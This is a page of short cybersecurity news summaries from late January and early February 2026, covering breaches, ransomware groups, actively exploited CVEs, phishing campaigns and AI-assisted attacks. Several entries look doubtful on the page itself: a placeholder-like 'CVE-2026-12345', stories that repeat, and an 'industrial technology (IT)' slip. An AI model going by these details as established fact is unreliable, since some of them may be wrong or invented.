Warning: Malicious ChatGPT Chrome Extensions Steal Session Tokens to Hijack Accounts

Researchers have identified 16 malicious Google Chrome extensions that masquerade as helpful tools for OpenAI's ChatGPT. Once installed, these extensions inject malicious scripts into the ChatGPT web application. The scripts are designed to monitor outbound requests, intercept sensitive data such as authorization details and session tokens, and exfiltrate them to an attacker-controlled server. This allows the attackers to hijack active user sessions, granting them full access to the victim's account and chat history.

Feb 2, 20264 min read

AI Social Network "Moltbook" Breach Exposes 1.5M API Keys and 29k User Emails

A significant data breach at the AI-focused social network 'Moltbook' has exposed 1.5 million API keys, 29,000 user emails, and other sensitive data tables. The investigation, conducted by security firm Wiz, not only uncovered the data exposure but also revealed systemic security flaws, such as a lack of rate-limiting on agent registration. The breach also provided a skewed insight into the platform's user base, showing that its 1.5 million 'agents' were owned by only 17,000 human users. Moltbook has since deployed fixes to secure the exposed data.

Feb 2, 20264 min read

New Iran-Linked 'RedKitten' Group Targets Human Rights NGOs with AI-Suspected Malware

A new cyber-espionage campaign by a Farsi-speaking threat actor dubbed 'RedKitten' is targeting human rights NGOs and activists documenting abuses in Iran. The campaign, observed by HarfangLab in January 2026, uses phishing emails with macro-laced Excel files as an initial vector. The malware is notable for its modularity and its use of legitimate public services like GitHub, Google Drive, and Telegram for C2 and payload delivery, a technique to evade detection. Researchers suspect the attackers may have used Large Language Models (LLMs) to assist in the development of their sophisticated tooling, marking a potential new trend in malware creation.

Feb 2, 20265 min read

Fortinet Scrambles to Fix Actively Exploited SSO Auth Bypass (CVE-2026-24858) Hijacking Devices

Fortinet has disclosed and patched a critical authentication bypass vulnerability, CVE-2026-24858, in its FortiCloud Single Sign-On (SSO) feature. The flaw is being actively exploited, allowing attackers with a FortiCloud account to log into devices registered to other users, leading to unauthorized configuration changes and account creation. The vulnerability affects a wide range of products, including FortiOS, FortiManager, and FortiAnalyzer. Due to the active exploitation and severity, CISA has added CVE-2026-24858 to its Known Exploited Vulnerabilities (KEV) catalog, urging users to patch and hunt for signs of compromise immediately.

Feb 2, 20265 min read

Microsoft Office Zero-Day Under Active Attack Bypasses Security Features

Microsoft has issued an emergency out-of-band patch for a high-severity zero-day vulnerability in Microsoft Office, CVE-2026-21509. The flaw, a security feature bypass with a CVSS score of 7.8, is being actively exploited in the wild through malicious documents. It allows attackers to circumvent Object Linking and Embedding (OLE) protections, leading to code execution if a user opens a specially crafted file. The vulnerability affects a wide range of Office products, including Office 2016 through LTSC 2024 and Microsoft 365 Apps. CISA has added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, mandating urgent patching for federal agencies and signaling a significant risk to all organizations.

Feb 2, 20266 min read

AI to Overtake Human Error as Top Cause of Breaches, Experian Predicts

In its 13th Annual Data Breach Industry Forecast, Experian predicts a paradigm shift in cybersecurity for 2026, with autonomous AI agents potentially surpassing human error as the leading cause of data breaches. The report warns that threat actors are weaponizing AI to create sophisticated polymorphic malware, execute highly personalized attacks, and generate 'pristine synthetic identities' at scale from stolen data. This new wave of AI-driven threats, combined with the looming risk of quantum computing, is expected to fuel a massive spike in identity theft and fundamentally change the nature of cyberattacks.

Feb 1, 20265 min read

Attacks on Industrial Environments Doubled in 2025, Report Warns

A new report from cybersecurity firm Cyble reveals a dramatic escalation in threats targeting industrial environments. According to its Annual Threat Landscape Report 2025, exploits against industrial technology (IT) and operational technology (OT) systems almost doubled last year. The report, published on January 15, 2026, documented nearly 6,000 ransomware attacks and identified numerous vulnerabilities in internet-exposed assets across critical infrastructure. Cyble predicts that in 2026, attackers will increasingly target exposed Human-Machine Interfaces (HMIs) and SCADA systems. This trend poses a significant risk to major global events, such as the 2026 Winter Olympics, where interconnected vendor systems create a rich target environment for disruption and extortion.

Feb 1, 20267 min read

FBI Shuts Down RAMP, a Notorious Ransomware Recruitment and Trading Hub

In a significant blow to the ransomware ecosystem, the U.S. Federal Bureau of Investigation (FBI) has seized the RAMP (Russian Anonymous MarketPlace) forum. The Russian-language site, which operated on both the clear and dark web, was a central hub for ransomware-as-a-service (RaaS) operations. It served as a recruitment ground for affiliates for major gangs like ALPHV/BlackCat and Qilin, a marketplace for initial access brokers, and a trading post for stolen data. The takedown, conducted with the DOJ, disrupts a key piece of infrastructure that enabled numerous high-profile cyberattacks.

Feb 1, 20264 min read

Supply Chain Attack: eScan Antivirus Update Server Compromised to Distribute Malware

Indian antivirus provider eScan, a product of MicroWorld Technologies, has suffered a supply chain attack. On January 20, 2026, a regional update server was compromised, causing it to push a malicious file named 'Reload.exe' to enterprise and consumer customers. According to security firm Morphisec, the malware disables the antivirus product by modifying the local HOSTS file to block future updates and then proceeds with a multi-stage infection to download additional payloads. While MicroWorld Technologies acknowledged the breach and isolated the server, it has disputed the 'supply chain attack' label. Affected users require a manual cleaning utility from eScan support for remediation.

Feb 1, 20266 min read

'WhisperPair' Bluetooth Flaw Exposes Millions of Headphones and Speakers to Eavesdropping

A newly discovered vulnerability named 'WhisperPair' affects millions of Bluetooth audio devices from major brands, including Sony, JBL, and Logitech. The flaw allows a nearby attacker to bypass standard Bluetooth pairing security protocols. Successful exploitation could enable an attacker to eavesdrop on private audio streams or inject malicious audio commands into the connected device. This discovery highlights significant security and privacy risks in widely used consumer electronics and the persistent challenges of securing wireless communication protocols.

Feb 1, 20265 min read

UStrive Mentoring Platform Exposes Data of 238,000 Users, Including Minors, via Leaky API

The non-profit mentoring platform UStrive has inadvertently exposed the sensitive personal data of over 238,000 users due to a misconfigured GraphQL API endpoint. A significant portion of the exposed user base includes minors, elevating the severity and privacy implications of the incident. The leaky API could have allowed unauthorized individuals to query and retrieve vast amounts of user data. This breach highlights the critical need for robust cybersecurity practices and secure API implementation, particularly for organizations in the non-profit sector that handle sensitive information, including that of children.

Feb 1, 20264 min read

Automated Attacks Wipe Exposed MongoDB Databases, Demanding $500 Ransom

An automated data extortion campaign is actively targeting publicly exposed and misconfigured MongoDB databases. A threat actor is systematically wiping data from these unsecured servers and leaving a ransom note demanding approximately $500 in Bitcoin for its return. Research from Flare identified over 3,100 MongoDB instances accessible without authentication, with nearly half (1,400) already compromised by this attacker. This campaign highlights the persistent threat of automated scanning and exploitation of basic security misconfigurations, demonstrating that even with lower ransom demands, such attacks remain a profitable venture for criminals preying on low-hanging fruit.

Feb 1, 20265 min read

Air Conditioning Giant Blue Star Discloses Data Breach Affecting Product Installation Data

Blue Star, a major Indian multinational specializing in air conditioning and commercial refrigeration, has announced it experienced a data security incident. The company reported unauthorized access to its product installation data. The breach was reported to its Compliance Officer on January 31, 2026. Blue Star has engaged external cybersecurity experts to investigate the incident's scope, perform a root cause analysis, and strengthen its security posture. Further details on the extent of the compromise and the responsible party have not yet been released as the investigation is ongoing.

Feb 1, 20264 min read

Cybersecurity Risks Mount as Partial US Government Shutdown Begins

A partial U.S. government shutdown began at midnight on January 31, 2026, after funding for several federal agencies, including the Department of Homeland Security (DHS), lapsed. Security experts are warning that such shutdowns create a period of heightened cybersecurity risk for the nation. With reduced staffing and coordination at key agencies like CISA, the government's ability to detect, respond to, and share intelligence about threats is diminished. Threat actors, both criminal and nation-state, are known to exploit these periods of disruption to launch targeted phishing, credential harvesting, and ransomware campaigns against government agencies and adjacent sectors.

Feb 1, 20264 min read

Cognizant Sued in Class-Action Lawsuits After TriZetto Data Breach

IT services giant Cognizant Technology Solutions is facing multiple class-action lawsuits in the U.S. following a significant data breach at its healthcare subsidiary, TriZetto Provider Solutions (TPS). The lawsuits, filed in New Jersey and Missouri, allege that Cognizant failed to adequately protect sensitive patient health and personal information processed by the TriZetto platform. Plaintiffs also claim the company unreasonably delayed notifying affected individuals, preventing them from taking timely steps to protect themselves from fraud and identity theft. The breach at TriZetto, a major processor of healthcare claims, has wide-ranging privacy implications for a large number of patients.

Jan 31, 20264 min read

Novel Phishing Attack Abuses Vercel and Telegram to Deliver RATs

A novel phishing campaign, observed between November 2025 and January 2026, is abusing trusted `*.vercel.app` domains to bypass email security filters and deliver malware. The attack, detailed by Cloudflare, uses financial lures like fake invoices to trick victims into clicking. A unique feature is its Telegram-gated payload delivery, which requires interaction with a Telegram bot to receive the final payload. This technique effectively filters out automated sandboxes and security researchers, ensuring the malware is only delivered to genuine targets. The campaign's ultimate goal is to install GoTo Resolve, a legitimate remote access tool, which is then abused by attackers for persistent access and control.

Jan 30, 20265 min read

New 'Sicarii Ransomware' RaaS Emerges, Targeting U.S. Manufacturing

A new ransomware-as-a-service (RaaS) operation named 'Sicarii Ransomware' has been discovered by researchers at CYFIRMA. Active since late 2025, the group is targeting the manufacturing sector in the United States. The malware encrypts victim files using AES-GCM and appends a '.sicarii' extension to them. In addition to encryption, the malware is capable of collecting system information and credentials from infected hosts, suggesting a double-extortion tactic may be part of their playbook. Tactical recommendations to defend against this threat include enhanced monitoring, maintaining offline backups, and strengthening network segmentation.

Jan 30, 20265 min read

Industry Responds to Threats with New Tools for Supply Chain, AI, and Malware Analysis

In response to the evolving threat landscape, several cybersecurity firms have launched new products in January 2026. SpyCloud has released its Supply Chain Threat Protection solution to address identity threats within vendor ecosystems. Vectra AI has enhanced its platform to specifically counter attacks that leverage AI, focusing on the AI attack lifecycle. Additionally, Booz Allen Hamilton has made its Vellox Reverser tool generally available, aiming to accelerate malware reverse engineering and threat intelligence analysis for cyber defenders. These releases highlight key areas of focus for the industry: securing the supply chain, defending against AI-powered threats, and speeding up incident analysis.

Jan 30, 20264 min read

Global Phishing Campaign Lures Victims with Fake Job Offers

A multi-lingual phishing campaign is targeting job seekers across the United States, United Kingdom, France, Italy, and Spain. According to research from Bitdefender, attackers are impersonating well-known employers and staffing companies, sending emails with fake job offers that promise easy work and fast interviews. The messages are tailored to the recipient's language and location. When a victim clicks a link in the email, they are taken to a credential harvesting webpage designed to steal personal data and login information. This campaign capitalizes on social engineering tactics that prey on individuals' career aspirations.

Jan 30, 20264 min read

Apple Boosts Privacy in iOS 26.3 with 'Limit Precise Location' Feature

Apple has introduced a new privacy feature called 'limit precise location' in its iOS 26.3 update. This setting is designed to give users more control over their data by reducing the precision of location information shared with cellular networks. While carriers still receive location data for operational purposes, the feature prevents them from obtaining a user's exact, fine-grained location, making it more difficult to track their precise movements. This update is part of a broader industry trend toward providing users with more granular privacy controls and addressing concerns about location tracking by mobile carriers.

Jan 30, 20263 min read

Critical 1-Click RCE Flaw in IDIS Cloud Manager Puts Users at Risk

A critical remote code execution (RCE) vulnerability, CVE-2025-12556, has been discovered in the IDIS Cloud Manager (ICM) viewer by researchers at Claroty's Team82. The flaw, which has a CVSS v4 score of 8.7, allows an attacker to execute arbitrary code on a user's machine by convincing them to click a specially crafted link. This '1-click RCE' vulnerability bypasses the browser sandbox, making it a potent weapon for spear-phishing campaigns. IDIS has released version 1.7.1 to address the issue and urges users to upgrade or uninstall the software immediately.

Jan 29, 20264 min read

AI-Fueled Cyberattacks Surge by 70%, Check Point's 2026 Report Reveals

Check Point's 14th annual Cyber Security Report highlights a dramatic escalation in the global threat landscape, revealing a 70% increase in cyberattacks since 2023. The 2026 report, analyzing trends from 2025, found that organizations faced an average of 1,968 attacks per week. A primary driver of this surge is the weaponization of Artificial Intelligence (AI), which attackers are using to enhance social engineering, accelerate malware development, and automate reconnaissance. The report also notes a shift in ransomware tactics towards data-only extortion and an increase in attacks targeting network edge devices like VPNs and IoT.

Jan 29, 20265 min read

Canada's Cyber Security Centre Warns of AI-Fueled Ransomware Evolution

The Canadian Centre for Cyber Security has issued a new 'Ransomware Threat Outlook,' warning that the ransomware threat to Canadian organizations is growing and evolving rapidly. The report highlights that criminals are increasingly leveraging artificial intelligence (AI) to make their attacks more sophisticated, easier to execute, and harder to detect. A key trend identified is the shift towards 'multi-extortion' tactics, where attackers steal data and threaten to leak it in addition to encrypting it. The report stresses that despite the advanced tactics, strong cyber hygiene remains a primary defense.

Jan 29, 20265 min read

Clop Ransomware Group Claims Attack on Canadian Helicopter Company

The notorious Clop ransomware group has claimed responsibility for a cyberattack against CMHHELI.COM, a Canadian company. On January 29, 2026, the group added the company to its dark web leak site, threatening to publish stolen data if a ransom is not paid. This incident highlights the persistent and indiscriminate nature of major ransomware gangs, who continue to target organizations of all sizes. Security experts advise victims to initiate incident response, validate backups, and engage professionals before considering any communication with the attackers.

Jan 29, 20265 min read

Open-Source Malware Skyrockets by 75%, Sonatype's 2026 Report Warns

Sonatype's 2026 'State of the Software Supply Chain' report reveals an alarming 75% increase in malicious open-source packages, with over 1.233 million identified. The report connects this surge to the rapid adoption of AI and automation in software development, which has accelerated open-source consumption to 9.8 trillion downloads across major registries. This increased velocity expands the attack surface, making it easier for attackers to inject malware into the software supply chain. The report also notes that 86% of traffic from Maven Central, a key Java repository, now comes from automated cloud services, amplifying the risk of widespread compromise from a single malicious package.

Jan 29, 20265 min read

Convergence of Identity and Data Security Creates New Attack Vectors, Netwrix Warns

A new report from Netwrix warns that the next wave of cyber threats will arise from the convergence of identity and data security. As organizations increasingly rely on automated workflows to manage data access, attackers are shifting their focus from stealing individual credentials to exploiting misconfigured identity orchestration and automation. The report predicts that failures in identity automation will directly lead to data exposure. With the rise of agentic AI, which can autonomously perform actions, securing the identity of these non-human agents becomes paramount. Netwrix concludes that unified visibility across both identity management and data security is now essential to mitigate these emerging risks.

Jan 29, 20265 min read

SoundCloud Breach Exposes Private Emails of 29.8 Million Users

A significant data breach at the music streaming service SoundCloud has resulted in the public release of a database containing the personal details of 29.8 million users. The data was leaked in January 2026 after the company reportedly refused to pay a ransom demand. The primary risk from this breach stems from the linking of users' private email addresses with their public profile metadata. This combination provides a rich source of data for attackers to launch targeted phishing, credential stuffing, and social engineering campaigns. The breach has been indexed by the notification service HaveIBeenPwned.

Jan 29, 20265 min read

ShinyHunters Claims Breach of Crunchbase, Betterment via Okta Vishing Attacks

The notorious cyber extortion syndicate ShinyHunters has claimed responsibility for breaching business intelligence firm Crunchbase and financial advisory company Betterment. According to the threat actor, the initial access was gained by using sophisticated voice phishing (vishing) attacks to socially engineer employees and compromise their Okta single sign-on (SSO) credentials. This method allows attackers to bypass weaker forms of multi-factor authentication. Neither of the targeted companies has publicly confirmed the breach.

Jan 29, 20265 min read

ShinyHunters Claims Breach of 10M Match Group Users from Hinge & OkCupid

The notorious cybercrime group ShinyHunters has claimed responsibility for a major data breach impacting Match Group, the parent company of popular dating apps like Hinge, OkCupid, and Match.com. The group posted on a dark web forum that it has stolen over 10 million user records, and released a 1.7GB sample as proof. The data allegedly includes sensitive user information such as names, phone numbers, IP addresses, and match logs, as well as internal corporate documents. ShinyHunters asserts the data was exfiltrated from a third-party analytics provider, AppsFlyer, highlighting a potential supply chain attack vector.

Jan 28, 20265 min read

Critical RCE Flaws in n8n Workflow Platform Put Thousands of Instances at Risk

Two new high-severity vulnerabilities have been discovered in the n8n workflow automation platform, a tool that often holds credentials to critical corporate systems. The most severe flaw, CVE-2026-1470, is a critical eval injection vulnerability (CVSS 9.9) that allows an authenticated attacker to bypass the expression sandbox and achieve full remote code execution. A second flaw, CVE-2026-0863 (CVSS 8.5), allows for a similar sandbox escape in the Python execution environment. A compromise could provide an attacker with a 'skeleton key' to an organization's infrastructure. This news is compounded by data showing over 39,000 n8n instances remain unpatched for a previous critical flaw.

Jan 28, 20264 min read

Malicious PyPI Packages `spellcheckerpy` & `spellcheckpy` Deliver RAT via Hidden Payload

A software supply chain attack has been uncovered on the Python Package Index (PyPI), involving two malicious packages named `spellcheckerpy` and `spellcheckpy`. Downloaded over 1,000 times, the packages contained a hidden, dormant payload. A later version update activated the malware, which was designed to fingerprint the compromised developer's system and deploy a Remote Access Trojan (RAT). The attack was cleverly concealed, with the malicious code base64-encoded and hidden inside a Basque language dictionary file. The C2 domain used has been linked to a hosting provider known to service nation-state actors, suggesting a potentially sophisticated adversary.

Jan 28, 20265 min read

US Indicts 31 More in ATM Jackpotting Ring Linked to Tren de Aragua Gang

A U.S. federal grand jury has indicted an additional 31 individuals for their participation in a widespread 'ATM jackpotting' conspiracy, bringing the total number of defendants to 87. The sophisticated scheme involved using malware to force ATMs to dispense large sums of cash. Many of the newly charged individuals are Venezuelan and Colombian nationals, including several identified members of the transnational criminal gang Tren de Aragua (TdA) who are in the U.S. illegally. The case highlights the growing convergence of organized crime and specialized cybercrime tactics.

Jan 28, 20264 min read

Nova Ransomware Group Claims Cyberattack on KPMG Netherlands, Sets 10-Day Deadline

The Nova ransomware group has claimed responsibility for a cyberattack against the Netherlands division of global professional services firm KPMG. The claim, which appeared on ransomware monitoring services on January 23, 2026, alleges that the group successfully breached KPMG's systems and exfiltrated sensitive data. In a classic double-extortion tactic, the Nova group has reportedly set a ten-day deadline for KPMG Netherlands to enter into ransom negotiations before they potentially leak the stolen data. KPMG has not yet publicly confirmed the attack.

Jan 28, 20264 min read

'Stanley' MaaS Sells Malicious Chrome Extensions Guaranteed for Web Store Publication

A new Malware-as-a-Service (MaaS) platform named 'Stanley' has appeared on Russian-language cybercrime forums, specializing in the sale of malicious Google Chrome extensions. A key feature of the service is a guarantee that the malicious extensions will be successfully published to the official Chrome Web Store, lending them an air of legitimacy. The primary purpose of these extensions is to facilitate phishing and credential theft by spoofing legitimate websites. The emergence of 'as-a-service' models like Stanley significantly lowers the barrier to entry for less sophisticated cybercriminals to launch effective attacks.

Jan 28, 20264 min read

Mustang Panda APT Deploys Signed Kernel-Mode Rootkit to Hide Backdoor

The Chinese-linked cyber-espionage group Mustang Panda has significantly upgraded its stealth capabilities by using a signed kernel-mode rootkit to deploy its TONESHELL backdoor. Observed by Kaspersky, the rootkit, named 'ProjectConfiguration.sys', is signed with a leaked digital certificate from a Chinese tech company. By operating at the kernel level as a minifilter driver, the rootkit can effectively hide its malicious processes, files, and registry keys from security software. This new technique allows the group to inject its TONESHELL backdoor directly into the memory of legitimate processes like 'svchost.exe', enhancing its persistence and evasion in attacks targeting government organizations in Southeast Asia.

Jan 28, 20266 min read

Illinois DHS Exposes Data of 700,000 Residents in Massive Misconfiguration Breach

The Illinois Department of Human Services (IDHS) has disclosed a major data breach affecting approximately 705,000 state residents. The breach was caused by incorrect privacy settings on internal planning maps that were inadvertently made public on a mapping website for up to four years. The exposed data includes addresses, case numbers, and medical plan information for Medicaid recipients, and names, addresses, and case details for customers of the Division of Rehabilitation Services. The exposure, which constitutes a HIPAA violation, was discovered in September 2025 but only announced in January 2026. IDHS has since secured the data and implemented new policies to prevent a recurrence.

Jan 27, 20265 min read

Fortinet Confirms Active Exploitation of FortiCloud SSO Bypass on Fully Patched FortiGate Firewalls

Fortinet has confirmed that a critical Single Sign-On (SSO) authentication bypass vulnerability affecting FortiCloud is being actively exploited in the wild. The attacks, linked to CVE-2025-59718 and CVE-2025-59719, are reportedly successful even against fully patched FortiGate firewalls. Attackers are exploiting the flaw by sending specially crafted SAML messages to bypass authentication. Once inside, they are creating persistent administrative accounts, enabling VPN access, and exfiltrating firewall configurations. This allows for long-term persistence and deep network compromise. Customers are urged to review Fortinet's advisories and take immediate mitigation steps.

Jan 27, 20264 min read

Microsoft Scrambles to Patch Actively Exploited Office Zero-Day, CISA Issues Urgent Directive

Microsoft has issued an emergency out-of-band security update for a high-severity zero-day vulnerability in Microsoft Office, tracked as CVE-2026-21509. The flaw, a security feature bypass with a CVSS score of 7.8, is being actively exploited in targeted attacks, allowing threat actors to bypass OLE mitigations via specially crafted Office files. In response, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating that federal agencies apply the patch by February 16, 2026. The vulnerability affects multiple versions of Office, including Office 2016, 2019, LTSC 2021, and Microsoft 365 Apps for Enterprise.

Jan 27, 20265 min read

Cyberattack Cripples Digital Services at Germany's Dresden State Art Collections

Germany's Dresden State Art Collections (SKD), one of Europe's most significant museum networks, has been hit by a cyberattack that caused widespread disruption to its digital infrastructure. The attack knocked out the SKD's online ticketing system, visitor services, museum shop website, and internal communications. On-site services were severely impacted, with ticket sales reverting to cash-only. While the operational disruption is significant, the SKD has stated that there is currently no evidence that any data, including sensitive collection or visitor data, was stolen during the incident. The attack highlights the increasing vulnerability of cultural institutions to cyber threats.

Jan 27, 20264 min read

Widespread Phishing Campaign Abuses Microsoft Teams Guest Invites to Target 6,000+ Users

A large-scale phishing campaign is abusing Microsoft Teams' guest invitation feature to target thousands of users with fake billing notices. Researchers at Check Point have observed over 12,000 phishing emails sent to more than 6,100 users, primarily in the manufacturing, technology, and education sectors in the United States. Attackers create Teams groups with finance-related names and send guest invitations to targets. The invitation email, which comes from a legitimate Microsoft address, contains obfuscated text that appears to be a billing notification, lending it an air of authenticity and increasing the likelihood that a user will click the malicious link.

Jan 27, 20264 min read

Everest Ransomware Leaks Data of 72 Million Under Armour Customers After Failed Talks

The Everest ransomware group has claimed a massive data breach against athletic apparel giant Under Armour. After negotiations allegedly failed, the group announced on its dark web leak site that it has published the full dataset, which it claims contains 191 million records, including 72.7 million unique email addresses. The compromised data reportedly includes sensitive customer information such as full names, phone numbers, physical locations, and purchase histories. This breach places a huge number of individuals at significant risk for targeted phishing campaigns, identity theft, and other fraudulent activities.

Jan 26, 20264 min read

Zoom & GitLab Race to Patch Critical Flaws, Including a 9.9 CVSS RCE Bug

Both Zoom and GitLab have released critical security updates to address several high-severity vulnerabilities. The most severe flaw, CVE-2026-22844, is a remote code execution vulnerability in Zoom Node Multimedia Routers (MMRs) with a near-perfect CVSS score of 9.9. This flaw could allow an unauthenticated attacker with network access to compromise the devices. GitLab's updates address multiple vulnerabilities, including two high-severity flaws (CVE-2025-13927 and CVE-2025-13928) that could allow an unauthenticated user to cause denial-of-service conditions. Users of all affected products are urged to apply the patches immediately.

Jan 26, 20264 min read

New 'Osiris' Ransomware Borrows TTPs from Medusa and Inc Gangs, Uses Signed Driver to Kill AV

A new ransomware strain named Osiris is demonstrating a high level of sophistication by combining tactics from established ransomware groups like Medusa and Inc. The attackers use Rclone for data exfiltration to Wasabi cloud storage and deploy a version of Mimikatz named `kaz.exe`, both TTPs linked to the Inc group. More significantly, Osiris uses a custom-developed and signed malicious driver, 'Abyssworker' (aka Poortry), in a Bring-Your-Own-Vulnerable-Driver (BYOVD) attack to terminate security software. This driver and its loader, 'Stonestop,' have been previously associated with the Medusa ransomware gang. The use of these advanced, borrowed TTPs suggests Osiris is operated by experienced actors, possibly former affiliates of other groups.

Jan 26, 20266 min read

Warning: Fully Patched FortiGate Firewalls Are Being Compromised via New SSO Bypass

Security analysts are warning of a new wave of attacks compromising even fully patched Fortinet FortiGate firewalls. The activity, observed since January 15, 2026, allows attackers to bypass SAML-based single sign-on (SSO) authentication to gain administrative access. The attacks result in unauthorized configuration changes, creation of persistent user accounts, and exfiltration of device configurations. Fortinet has reportedly identified a new, distinct attack path related to previously disclosed vulnerabilities (CVE-2025-59718, CVE-2025-59719), suggesting existing patches may not be fully effective.

Jan 26, 20266 min read

New QuantumLeap Ransomware Demands $50M, Halts Global Shipments at NaviGistics

The global logistics firm NaviGistics has suffered a catastrophic cyberattack from a new ransomware strain dubbed 'QuantumLeap'. The attack, orchestrated by a group calling itself 'Entropy Collective', has encrypted critical systems and brought the company's worldwide shipping and freight operations to a standstill. The threat actors gained initial access via a compromised VPN account lacking multi-factor authentication, demonstrating a sophisticated lateral movement campaign before deploying the payload. The group is demanding a $50 million ransom and has threatened to leak over 2 terabytes of exfiltrated data, including sensitive customer and financial records. This incident highlights the extreme vulnerability of the global supply chain to targeted cyber-extortion and the devastating operational and financial impact of modern ransomware attacks.

Jan 26, 20266 min read

Urgent Patch Required: Critical RCE Zero-Day (CVE-2026-12345) in NexusFlow API Gateway Under Active Attack

A critical pre-authentication remote code execution (RCE) zero-day vulnerability, CVE-2026-12345, is being actively exploited in the wild against the popular NexusFlow API Gateway. The flaw, which carries the maximum CVSS score of 10.0, allows unauthenticated attackers to gain complete control of vulnerable servers by sending a single, specially crafted HTTP request. Security firm Horizon Security Labs discovered the exploitation during a breach investigation. The vulnerability is wormable, creating a risk of rapid, widespread compromise. NexusFlow's parent company, Voltara, has released an emergency patch (version 3.8.1) and is urging all customers to update immediately. CISA has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to patch by February 9, 2026.

Jan 26, 20266 min read

Medusa Ransomware Exploits Cybersecurity Gaps, Escalating Attacks Across Africa

Ransomware attacks are a pervasive and highly damaging threat across the African continent, where a significant cybersecurity skills and resources gap creates a fertile ground for cybercriminals. Notorious ransomware groups, including Medusa, are increasingly targeting organizations in the region, leveraging double extortion tactics to maximize pressure on their victims. These attacks involve not only encrypting critical data but also stealing it and threatening public release if the ransom is not paid. Key sectors such as healthcare, finance, and critical infrastructure are prime targets. According to reports, a high percentage of African organizations hit by ransomware end up paying the ransom, perpetuating the cycle of attacks. The situation underscores an urgent need for increased investment in cybersecurity infrastructure, skills development, and awareness across the continent.

Jan 26, 20265 min read

Nation-State Actor 'SteelHydra' (APT47) Deploys 'GeoShifter' ICS Malware to Spy on Geothermal Energy Firms

The nation-state threat actor 'SteelHydra' (also tracked as APT47) is behind a sophisticated cyber-espionage campaign targeting the geothermal energy sector. According to research from Mandiant, the campaign has impacted firms in the United States, Canada, and Iceland. The attackers are using a novel, custom-built malware framework called 'GeoShifter', which is specifically designed to operate in Industrial Control System (ICS) environments and interface with SCADA/PLC systems from vendors like Siemens and Schneider Electric. The initial infection vector is a spear-phishing campaign that deploys a backdoor named 'PipeDreamer'. The ultimate goal of the campaign appears to be the theft of intellectual property and operational data related to geothermal technology, which could be used for economic advantage or to plan future disruptive attacks.

Jan 26, 20267 min read

'SilentVoice' Phishing Campaign Weaponizes AI Deepfake Audio to Bypass MFA

A sophisticated social engineering campaign named 'SilentVoice' is successfully bypassing multi-factor authentication (MFA) by using AI-generated deepfake audio of corporate executives. According to researchers at Proofpoint, attackers clone an executive's voice from public audio samples and then use it in a vishing (voice phishing) call to a subordinate employee. The deepfake voice creates a sense of urgency, tricking the employee into entering their credentials on a fake site and then approving the subsequent MFA push notification sent to their device. This highly convincing technique circumvents the protection offered by many common MFA methods, leading to full account takeover. The campaign has already resulted in successful breaches and financial fraud, highlighting the emerging threat of AI-weaponized social engineering.

Jan 26, 20266 min read

NPM Package 'js-utility-kit' Hijacked in Supply Chain Attack to Steal Crypto Keys and Credentials

A significant software supply chain attack has compromised the popular NPM package 'js-utility-kit', which is downloaded over 5 million times per week. Security firm Snyk discovered that malicious versions (2.1.8, 2.1.9, and 2.2.1) were published after the maintainer's account was hijacked via a credential stuffing attack. The compromised packages contained a post-install script that downloaded and executed a sophisticated information stealer. The malware was designed to steal cryptocurrency private keys, browser extension data for crypto wallets, and sensitive credentials such as environment variables and cloud provider CLI configurations from developers' machines and CI/CD pipelines. The NPM security team has removed the malicious versions, but any project that installed them between January 24 and 26 is considered compromised and requires immediate auditing and credential rotation.

Jan 26, 20266 min read

Fintech Startup VoltPay Leaks 5 Million Customer Records via Misconfigured Cloud Database

The financial technology startup VoltPay has confirmed a massive data breach affecting approximately 5 million users. The leak was caused by a misconfigured Elasticsearch database that was left publicly accessible on the internet without a password for over three months. A security researcher discovered and reported the exposure. The leaked data includes highly sensitive information: full names, email addresses, phone numbers, physical addresses, dates of birth, hashed passwords, and full transaction histories. The last four digits of credit card and bank account numbers were also exposed. This incident, attributed to 'human error during a server migration', places millions of users at significant risk of identity theft and targeted phishing attacks, and has reportedly triggered investigations by U.S. and European regulators.

Jan 26, 20266 min read

International Operation 'Echidna' Dismantles 'Crimson Market' Dark Web Hub, 50+ Arrested

A coordinated international law enforcement action, codenamed 'Operation Echidna', has successfully dismantled 'Crimson Market', one of the largest dark web marketplaces for cybercrime tools and stolen data. The operation, involving the FBI, Europol, and the UK's NCA, resulted in the seizure of the market's server infrastructure and the arrest of over 50 individuals worldwide, including its alleged administrator. Crimson Market was a key hub for selling billions of stolen credentials, malware-as-a-service (including ransomware and info-stealers), and phishing kits. The 18-month investigation involved undercover operations to trace cryptocurrency transactions. The takedown represents a major disruption to the cybercrime economy, and data from the seized servers is expected to lead to further arrests.

Jan 26, 20264 min read

Volt Typhoon Linked to Breach at U.S. Water Utility, Exfiltrating Operational Documents

The Chinese state-sponsored group Volt Typhoon has been attributed to a data breach at the Park County Water District in Colorado. According to a joint advisory from CISA, the FBI, and the NSA, the hackers exploited a known vulnerability in an internet-facing network appliance to gain initial access. Consistent with their known TTPs, Volt Typhoon then used 'living off the land' techniques, leveraging built-in network administration tools to blend in and evade detection. The attackers moved laterally within the IT network and exfiltrated sensitive operational documents, including engineering schematics and maintenance schedules. While officials stated that the operational technology (OT) network and water supply were not affected, the incident highlights the group's continued focus on reconnaissance against U.S. critical infrastructure.

Jan 26, 20266 min read

Researchers Detail 'ChronoStealer', a New Modular Info-Stealing Malware-as-a-Service

Security researchers at Check Point have published a deep-dive analysis of 'ChronoStealer', a new and highly modular information-stealing malware sold on a subscription basis in underground forums. This Malware-as-a-Service (MaaS) model allows low-skilled criminals to rent the sophisticated tool and its infrastructure for as little as $200 per month. ChronoStealer's core function is to steal credentials from over 50 web browsers and other applications. Its capabilities can be expanded with add-on modules for stealing cryptocurrency wallets, logging keystrokes, and capturing session cookies. The malware uses the Telegram API for C2 communications to better blend in with legitimate traffic. The rise of such user-friendly, powerful MaaS platforms represents a significant force multiplier for the cybercrime ecosystem.

Jan 26, 20265 min read

Massive 149 Million Credential Leak Exposes Gmail, Facebook, and Financial Service Users

A publicly accessible, unencrypted 96 GB database containing 149.4 million unique login credentials has been discovered by a security researcher. The data, believed to be compiled from various infostealer malware logs and past breaches, impacts an estimated 48 million Gmail accounts, alongside users of Facebook, financial services, government portals, and numerous other online platforms. The leak includes usernames, passwords, and the direct login URLs, posing a significant risk of account takeover and fraud for millions of individuals globally.

Jan 25, 20265 min read

Nike Probes Data Breach Claim by 'WorldLeaks' Extortion Group

